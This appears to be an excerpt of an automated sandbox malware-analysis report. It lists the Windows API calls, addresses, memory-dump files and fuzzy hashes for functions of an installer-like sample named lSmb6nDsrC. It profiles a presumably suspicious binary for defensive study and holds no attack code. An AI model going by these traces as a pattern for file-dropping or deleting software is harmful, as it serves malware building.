                                                    • Instruction ID: c141ebc68f4164d0a3663fa1b1ea49181af819f28e12deb644bc081b11005b13
                                                    • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                    • Instruction Fuzzy Hash: 5DC08C30300A02DACF000B218F087073950AB00380F19483AA582E00A0CA308044CD2D
                                                    APIs
                                                    • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040347F,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060D7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: FileWrite
                                                    • String ID:
                                                    • API String ID: 3934441357-0
                                                    • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                    • Instruction ID: de33e43015841e90b47a85578f5cc3acb86098a1fa118a6604a55d69533944a7
                                                    • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                    • Instruction Fuzzy Hash: 41E08C3224022AABCF109E508D00EEB3B6CEB003A0F018433FD26E2090D630E83197A4
                                                    APIs
                                                    • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034B1,00000000,00000000,00403308,000000FF,00000004,00000000,00000000,00000000), ref: 004060A8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                    • Instruction ID: fd87eb1c4e4509ee71b5dc1f82ee1534a3bbef2287d177a98c1a1ef8e7fccbc0
                                                    • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                    • Instruction Fuzzy Hash: 11E08C3229021AEBDF119E50CC00AEB7BACEB043A0F018436FD22E3180D671E83187A9
                                                    APIs
                                                    • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044FE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID:
                                                    • API String ID: 3850602802-0
                                                    • Opcode ID: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
                                                    • Instruction ID: 5c877ab33ec7e7ab303c696e8a99d36134f19a60efc45403e0926baa73fdbb46
                                                    • Opcode Fuzzy Hash: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
                                                    • Instruction Fuzzy Hash: 9AC09BF57413017BDA209F509D45F1777585790710F15453D7350F50E0CBB4E450D61D
                                                    APIs
                                                    • ShellExecuteExW.SHELL32(?), ref: 00405B56
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: ExecuteShell
                                                    • String ID:
                                                    • API String ID: 587946157-0
                                                    • Opcode ID: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
                                                    • Instruction ID: 080962bbef7e268e86b0d243ececfcd1ad47764945baea7f73af6130fa7b9bd6
                                                    • Opcode Fuzzy Hash: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
                                                    • Instruction Fuzzy Hash: A9C092F2100201EFE301CF80CB09F067BE8AF54306F028058E1899A060CB788800CB29
                                                    APIs
                                                    • SendMessageW.USER32(00000028,?,00000001,00404300), ref: 004044E3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID:
                                                    • API String ID: 3850602802-0
                                                    • Opcode ID: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
                                                    • Instruction ID: a1e91a2b22b377b77c28deac9acb262fc7b3ebada01c3a2f9bc193e64980b6bc
                                                    • Opcode Fuzzy Hash: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
                                                    • Instruction Fuzzy Hash: E9B09236690A40AADA215B00DE09F867B62A7A8701F008438B240640B0CAB204A1DB08
                                                    APIs
                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403247,?), ref: 004034C2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: FilePointer
                                                    • String ID:
                                                    • API String ID: 973152223-0
                                                    • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                    • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                    • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                    • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                    APIs
                                                    • KiUserCallbackDispatcher.NTDLL(?,00404299), ref: 004044CC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: CallbackDispatcherUser
                                                    • String ID:
                                                    • API String ID: 2492992576-0
                                                    • Opcode ID: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
                                                    • Instruction ID: bf70c606a766814dc6d2ff6c1013b69bc1ca18b78975ad7518874070628387b3
                                                    • Opcode Fuzzy Hash: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
                                                    • Instruction Fuzzy Hash: BEA00176544900ABCA16AB50EF0980ABB72BBA8701B528879A285510388B725921FB19
                                                    APIs
                                                    • CloseHandle.KERNEL32(FFFFFFFF,00403A4C,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403B24
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 4fffb8c71d51b546a7e2127151d0507ebb76f0821c6fee4e4994e39edc86062b
                                                    • Instruction ID: 13c518e9ac0cc08fdea238e66527cd13fc05b27a1f87e487e8402aab48b93ad6
                                                    • Opcode Fuzzy Hash: 4fffb8c71d51b546a7e2127151d0507ebb76f0821c6fee4e4994e39edc86062b
                                                    • Instruction Fuzzy Hash: D1C0223010830882D0203F389E4FA093A289700339B608325B0B9B00F2C73CA24A042D
                                                    APIs
                                                    • GetDlgItem.USER32(?,000003FB), ref: 004049E0
                                                    • SetWindowTextW.USER32(00000000,?), ref: 00404A0A
                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00404ABB
                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404AC6
                                                    • lstrcmpiW.KERNEL32(: Completed,00422F08,00000000,?,?), ref: 00404AF8
                                                    • lstrcatW.KERNEL32(?,: Completed), ref: 00404B04
                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B16
                                                      • Part of subcall function 00405B65: GetDlgItemTextW.USER32(?,?,00000400,00404B4D), ref: 00405B78
                                                      • Part of subcall function 004067CF: CharNextW.USER32(?,*?|<>/":,00000000,00434000,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,004034D7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406832
                                                      • Part of subcall function 004067CF: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406841
                                                      • Part of subcall function 004067CF: CharNextW.USER32(?,00434000,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,004034D7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406846
                                                      • Part of subcall function 004067CF: CharPrevW.USER32(?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,004034D7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406859
                                                    • GetDiskFreeSpaceW.KERNEL32(00420ED8,?,?,0000040F,?,00420ED8,00420ED8,?,00000001,00420ED8,?,?,000003FB,?), ref: 00404BD9
                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BF4
                                                      • Part of subcall function 00404D4D: lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DEE
                                                      • Part of subcall function 00404D4D: wsprintfW.USER32 ref: 00404DF7
                                                      • Part of subcall function 00404D4D: SetDlgItemTextW.USER32(?,00422F08), ref: 00404E0A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                    • String ID: : Completed$A$Genetics Announcements Mess Premier Appliance Structures
                                                    • API String ID: 2624150263-3287170963
                                                    • Opcode ID: 2c04f043fab078114f436bc2b0f460e04cb31fe4a389aa85165ae8fc382e2e95
                                                    • Instruction ID: 030197d704291a410dcd06cfc4277a043b64cd4f667f0077e3e502e998d69d3f
                                                    • Opcode Fuzzy Hash: 2c04f043fab078114f436bc2b0f460e04cb31fe4a389aa85165ae8fc382e2e95
                                                    • Instruction Fuzzy Hash: CBA1A0B1900208ABDB11AFA5DD45AAF77B8EF84314F11803BF611B62D1D77C9A418B6D
                                                    APIs
                                                    • DeleteFileW.KERNEL32(?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00434000), ref: 00405C56
                                                    • lstrcatW.KERNEL32(00424F10,\*.*), ref: 00405C9E
                                                    • lstrcatW.KERNEL32(?,0040A014), ref: 00405CC1
                                                    • lstrlenW.KERNEL32(?,?,0040A014,?,00424F10,?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00434000), ref: 00405CC7
                                                    • FindFirstFileW.KERNEL32(00424F10,?,?,?,0040A014,?,00424F10,?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00434000), ref: 00405CD7
                                                    • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D77
                                                    • FindClose.KERNEL32(00000000), ref: 00405D86
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                    • String ID: C:\Users\user~1\AppData\Local\Temp\$\*.*
                                                    • API String ID: 2035342205-1117835029
                                                    • Opcode ID: a58a7e6cf5cd5b323d99b2e7efe97abcbadf979a8ae7158d9cb99184f307206c
                                                    • Instruction ID: aec485693c4c1533f42b9347a66a6bbcb57ea8568fe9c979ecac7928daa7b7f5
                                                    • Opcode Fuzzy Hash: a58a7e6cf5cd5b323d99b2e7efe97abcbadf979a8ae7158d9cb99184f307206c
                                                    • Instruction Fuzzy Hash: 8741D230801A14BADB31BB659D4DAAF7678EF41718F14813FF801B11D5D77C8A829EAE
                                                    APIs
                                                    • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E
                                                    Strings
                                                    • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache, xrefs: 0040226E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: CreateInstance
                                                    • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
                                                    • API String ID: 542301482-3291747264
                                                    • Opcode ID: d5992b275958797d45e0307967f226c0e94861c2e3f740a4b3dedb0ac196cb80
                                                    • Instruction ID: 8307c529eb9feefa1617cd4f78f27985085e4fae61a1ffd37fb0b3adda41be3b
                                                    • Opcode Fuzzy Hash: d5992b275958797d45e0307967f226c0e94861c2e3f740a4b3dedb0ac196cb80
                                                    • Instruction Fuzzy Hash: 00410575A00209AFCB40DFE4C989EAD7BB5FF48308B20456EF505EB2D1DB799982CB54
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: FileFindFirst
                                                    • String ID:
                                                    • API String ID: 1974802433-0
                                                    • Opcode ID: e451494837d02e9de811704e2342817bf1df0b816b53b23ee01b1b597b483687
                                                    • Instruction ID: a06f58704ac02dcae893024ea8a23b5ac4ca5f5a8623c8e138aed3c50dac2e18
                                                    • Opcode Fuzzy Hash: e451494837d02e9de811704e2342817bf1df0b816b53b23ee01b1b597b483687
